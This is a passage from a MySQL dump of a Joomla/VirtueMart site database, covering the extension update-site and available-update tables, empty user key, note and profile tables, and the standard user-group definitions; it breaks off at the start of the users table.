Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_category_update.xml',1,1728280867,''),(130,'VirtueMart plg_vmpayment_klarna Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmpayment_klarna_update.xml',0,0,''),(114,'VirtueMart3 mod_virtuemart_product Update Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_product_update.xml',0,0,''),(113,'VirtueMart3 mod_virtuemart_manufacturer Update Site','extension','http://virtuemart.net/releases/vm3/mod_virtuemart_manufacturer_update.xml',1,1728280867,''),(146,'TCPDF Update Site','extension','http://virtuemart.net/releases/TCPDF/tcpdf.xml',0,0,''),(147,'jDiction Package on jdiction.org','extension','http://update.jdiction.org/packages/pkg_jdiction/extension.xml',0,0,''),(148,'Collection on jdiction.org','collection','http://update.jdiction.org/update.xml',0,0,''),(150,'Akeeba FEF','extension','http://cdn.akeebabackup.com/updates/fef.xml',0,0,''),(157,'VirtueMart plg_vmpayment_eway Update Site','extension','\n            http://virtuemart.net/releases/vm3/plg_vmpayment_eway_update.xml',0,0,''),(153,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1728280867,''),(154,'AllVideos','extension','http://cdn.joomlaworks.org/updates/allvideos.xml',0,0,''),(155,'PLG_EASYKEYWORDSITEMAP','extension','https://check.kubik-rubik.de/updates/easykeywordsitemap.xml',0,0,''),(156,'JL Sitemap','extension','https://joomline.net/update.html?extension_id=2.xml',0,0,''),(158,'VirtueMart, ${PHING.COMPANY} - ${PHING.NAME.EXTSHORT} - Update Site','extension','http://virtuemart.net/releases/vm3/plg_vmcustom_download_simple_update.xml',0,0,''),(160,'Akeeba FEF','extension','http://cdn.akeeba.com/updates/fef.xml',1,1728280867,''),(161,'Akeeba Backup Core','extension','https://cdn.akeeba.com/updates/pkgakeebacore.xml',1,1728280867,''),(162,'Admin Tools Core','extension','https://cdn.akeeba.com/updates/pkgadmintoolscore.xml',1,1728280867,''),(163,'JCE Editor Package','extension','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml',1,1728280867,''),(164,'DJ-ImageSlider Package','extension','http://dj-extensions.com/updates/djimageslider.xml',1,1728280868,''),(165,'FOF 4.x','extension','http://cdn.akeeba.com/updates/fof4_file.xml',1,1728280868,'');
/*!40000 ALTER TABLE `fz6t4_update_sites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_update_sites_extensions`
--

DROP TABLE IF EXISTS `fz6t4_update_sites_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_update_sites_extensions` (
  `update_site_id` int NOT NULL DEFAULT '0',
  `extension_id` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_update_sites_extensions`
--

LOCK TABLES `fz6t4_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `fz6t4_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `fz6t4_update_sites_extensions` VALUES (1,700),(2,700),(70,28),(110,10029),(111,10031),(112,10032),(113,10030),(114,10028),(115,10027),(116,10054),(117,10047),(118,10121),(119,10063),(120,10006),(121,10008),(122,10116),(123,10117),(124,10106),(125,10001),(126,10000),(129,10002),(130,10003),(131,10004),(132,10005),(133,10007),(134,10061),(135,10062),(136,10052),(137,10053),(138,10018),(139,10019),(140,10020),(141,10021),(142,10022),(143,10024),(144,10025),(145,10026),(146,10122),(147,10129),(148,10129),(150,10131),(151,10132),(153,10038),(154,10135),(155,10137),(156,10146),(157,10147),(158,10148),(159,10132),(160,10131),(161,10134),(162,10152),(163,10154),(164,10041),(165,10157);
/*!40000 ALTER TABLE `fz6t4_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_updates`
--

DROP TABLE IF EXISTS `fz6t4_updates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_updates` (
  `update_id` int NOT NULL AUTO_INCREMENT,
  `update_site_id` int DEFAULT '0',
  `extension_id` int DEFAULT '0',
  `name` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `description` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `folder` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `client_id` tinyint DEFAULT '0',
  `version` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  `data` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `detailsurl` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `infourl` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `extra_query` varchar(1000) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_id`)
) ENGINE=MyISAM AUTO_INCREMENT=690 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_updates`
--

LOCK TABLES `fz6t4_updates` WRITE;
/*!40000 ALTER TABLE `fz6t4_updates` DISABLE KEYS */;
INSERT INTO `fz6t4_updates` VALUES (594,140,0,'VirtueMart - Shipment, by Weight, country, zip,... ','VirtueMart - Shipment, Shipment, by Weight, country, zip,... ','standard','plugin','vmshipment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmshipment_weight_countries_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(591,144,10025,'Search - VirtueMart','Search - VirtueMart','virtuemart','plugin','search',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_search_virtuemart_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(590,145,10026,'VirtueMart Admin module','VirtueMart Admin module','mod_vmmenu','module','',1,'4.0.2','','http://virtuemart.net/releases/vm3/mod_vmmenu_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(682,153,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(683,153,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/vi-VN_details.xml','',''),(681,153,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(680,153,0,'Turkmen','','pkg_tk-TM','package','',0,'3.5.0.2','','https://update.joomla.org/language/details3/tk-TM_details.xml','',''),(677,153,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(678,153,0,'Thai','','pkg_th-TH','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(676,153,0,'Syriac, East','','pkg_sy-IQ','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(674,153,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(675,153,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(673,153,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(671,153,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(672,153,0,'Spanish','','pkg_es-ES','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(669,153,0,'Sinhala','','pkg_si-LK','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/si-LK_details.xml','',''),(670,153,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(668,153,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(665,153,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(666,153,0,'Russian','','pkg_ru-RU','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(667,153,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(664,153,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(661,153,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(662,153,0,'Polish','','pkg_pl-PL','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(663,153,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(660,153,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'3.4.2.1','','https://update.joomla.org/language/details3/nn-NO_details.xml','',''),(658,153,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/srp-ME_details.xml','',''),(659,153,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.12.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(656,153,0,'Macedonian','','pkg_mk-MK','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/mk-MK_details.xml','',''),(657,153,0,'Malay','','pkg_ms-MY','package','',0,'3.4.1.2','','https://update.joomla.org/language/details3/ms-MY_details.xml','',''),(655,153,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(654,153,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(653,153,0,'Korean','','pkg_ko-KR','package','',0,'3.8.9.1','','https://update.joomla.org/language/details3/ko-KR_details.xml','',''),(652,153,0,'Khmer','','pkg_km-KH','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/km-KH_details.xml','',''),(651,153,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(650,153,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(649,153,0,'Italian','','pkg_it-IT','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(647,153,0,'Indonesian, Bahasa Indonesia','','pkg_id-ID','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/id-ID_details.xml','',''),(648,153,0,'Irish','','pkg_ga-IE','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/ga-IE_details.xml','',''),(646,153,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.12.2','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(643,153,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(644,153,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/he-IL_details.xml','',''),(645,153,0,'Hindi, India','','pkg_hi-IN','package','',0,'3.3.6.2','','https://update.joomla.org/language/details3/hi-IN_details.xml','',''),(642,153,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(639,153,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(641,153,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(640,153,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(638,153,0,'German','','pkg_de-DE','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(637,153,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(636,153,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/gl-ES_details.xml','',''),(635,153,0,'French, Canada','','pkg_fr-CA','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/fr-CA_details.xml','',''),(634,153,0,'French','','pkg_fr-FR','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(633,153,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(631,153,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(632,153,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(630,153,0,'Esperanto','','pkg_eo-XX','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/eo-XX_details.xml','',''),(629,153,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(628,153,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(626,153,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(627,153,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(616,153,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.6.5.2','','https://update.joomla.org/language/details3/bg-BG_details.xml','',''),(617,153,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(618,153,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(619,153,0,'Chinese, Traditional','','pkg_zh-TW','package','',0,'3.8.0.1','','https://update.joomla.org/language/details3/zh-TW_details.xml','',''),(620,153,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(621,153,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(622,153,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(623,153,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(624,153,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(625,153,0,'Dzongkha','','pkg_dz-BT','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/dz-BT_details.xml','',''),(615,153,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(613,153,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/be-BY_details.xml','',''),(614,153,0,'Bengali, Bangladesh','','pkg_bn-BD','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/bn-BD_details.xml','',''),(612,153,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(610,153,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(611,153,0,'Armenian','','pkg_hy-AM','package','',0,'3.4.4.1','','https://update.joomla.org/language/details3/hy-AM_details.xml','',''),(592,143,10024,'VirtueMart - Avatax','VirtueMart - Avatax, dynamic realtime tax calculation by Avalara','avalara','plugin','vmcalculation',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmcalculation_avalara_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(593,141,10021,'VirtueMart - Textinput','VirtueMart - Textinput','textinput','plugin','vmcustom',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmcustom_textinput_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(595,138,10018,'VirtueMart - Payments, Authorise.net','VirtueMart - Payments, Authorise.net','authorizenet','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_authorisenet_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(596,134,10061,'VirtueMart - Payments, Amazon','VirtueMart - Payments, Amazon','amazon','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_amazon_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(597,132,10005,'VirtueMart - Payments, Sofort','VirtueMart - Payments, Sofort','sofort','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_sofort_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(598,131,10004,'VirtueMart - Payments, Klarna Checkout','VirtueMart - Payments, Klarna Checkout','klarnacheckout','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_klarnacheckout_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(599,159,10132,'FOF 3.x Stable','','file_fof30','file','',0,'3.8.1','','http://cdn.akeeba.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-8-1.html',''),(600,126,10000,'VirtueMart','VirtueMart Component','com_virtuemart','component','',1,'4.2.6','','http://virtuemart.net/releases/vm3/virtuemart_update.xml','https://www.virtuemart.net/news/virtuemart-for-joomla-5',''),(601,125,10001,'VirtueMart AIO','VirtueMart AIO Component','com_virtuemart_allinone','component','',1,'4.2.4','','http://virtuemart.net/releases/vm3/virtuemart_aio_update.xml','http://virtuemart.net/news/latest-news/effective-and-sustainable-funding-with-a-virtuemart-membership',''),(602,122,10116,'VirtueMart - Payments, Skrill','VirtueMart - Payments, Skrill','skrill','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_skrill_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(603,121,10008,'VirtueMart - Payments, Paybox','VirtueMart - Payments, Paybox','paybox','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_paybox_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(604,119,10063,'VirtueMart - Payments, Klick and Pay','VirtueMart - Payments, Klick and Pay','klikandpay','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_klikandpay_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(605,129,10002,'VirtueMart - Payments, Standard','VirtueMart - Payments, Standard','standard','plugin','vmpayment',0,'4.0.2','','http://virtuemart.net/releases/vm3/plg_vmpayment_standard_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(606,112,10032,'VirtueMart Category module','VirtueMart Category module','mod_virtuemart_category','module','',0,'4.0.2','','http://virtuemart.net/releases/vm3/mod_virtuemart_category_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(607,113,10030,'VirtueMart Brand module','VirtueMart Brand module','mod_virtuemart_manufacturer','module','',0,'4.0.2','','http://virtuemart.net/releases/vm3/mod_virtuemart_manufacturer_update.xml','https://docs.virtuemart.net/tutorials/installation-migration-upgrade/226-update-single-plugin-delivered-by-aio.html',''),(609,153,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/sq-AL_details.xml','',''),(608,153,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(688,164,10041,'DJ-ImageSlider Package','','pkg_dj-imageslider','package','',0,'4.6.2 for Joomla 4.x','','http://dj-extensions.com/updates/djimageslider.xml','https://dj-extensions.com/component/ars/items/dj-imageslider462?category_id=11',''),(684,153,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.12.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','','');
/*!40000 ALTER TABLE `fz6t4_updates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_user_keys`
--

DROP TABLE IF EXISTS `fz6t4_user_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_user_keys` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `user_id` varchar(150) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `series` varchar(191) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `invalid` tinyint NOT NULL,
  `time` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `uastring` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `series` (`series`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_user_keys`
--

LOCK TABLES `fz6t4_user_keys` WRITE;
/*!40000 ALTER TABLE `fz6t4_user_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_user_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_user_notes`
--

DROP TABLE IF EXISTS `fz6t4_user_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_user_notes` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int unsigned NOT NULL DEFAULT '0',
  `catid` int unsigned NOT NULL DEFAULT '0',
  `subject` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `body` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint NOT NULL DEFAULT '0',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_user_id` int unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_user_id` int unsigned NOT NULL,
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_category_id` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_user_notes`
--

LOCK TABLES `fz6t4_user_notes` WRITE;
/*!40000 ALTER TABLE `fz6t4_user_notes` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_user_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_user_profiles`
--

DROP TABLE IF EXISTS `fz6t4_user_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_user_profiles` (
  `user_id` int NOT NULL,
  `profile_key` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `profile_value` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Simple user profile storage table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_user_profiles`
--

LOCK TABLES `fz6t4_user_profiles` WRITE;
/*!40000 ALTER TABLE `fz6t4_user_profiles` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_user_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_user_usergroup_map`
--

DROP TABLE IF EXISTS `fz6t4_user_usergroup_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_user_usergroup_map` (
  `user_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id',
  `group_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id',
  PRIMARY KEY (`user_id`,`group_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_user_usergroup_map`
--

LOCK TABLES `fz6t4_user_usergroup_map` WRITE;
/*!40000 ALTER TABLE `fz6t4_user_usergroup_map` DISABLE KEYS */;
INSERT INTO `fz6t4_user_usergroup_map` VALUES (676,8),(677,2),(683,2),(696,2),(698,2),(743,2);
/*!40000 ALTER TABLE `fz6t4_user_usergroup_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_usergroups`
--

DROP TABLE IF EXISTS `fz6t4_usergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_usergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id',
  `lft` int NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `title` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  KEY `idx_usergroup_title_lookup` (`title`),
  KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_usergroups`
--

LOCK TABLES `fz6t4_usergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_usergroups` DISABLE KEYS */;
INSERT INTO `fz6t4_usergroups` VALUES (1,0,1,20,'Public'),(2,1,6,17,'Registered'),(3,2,7,14,'Author'),(4,3,8,11,'Editor'),(5,4,9,10,'Publisher'),(6,1,2,5,'Manager'),(7,6,3,4,'Administrator'),(8,1,18,19,'Super Users'),(12,2,15,16,'Customer Group (Example)'),(10,3,12,13,'Shop Suppliers (Example)');
/*!40000 ALTER TABLE `fz6t4_usergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_users`
--

DROP TABLE IF EXISTS `fz6t4_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_users` (
  `id` int NOT NULL AUTO_INCREMENT,
  `name` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `username` varchar(150) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `email` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
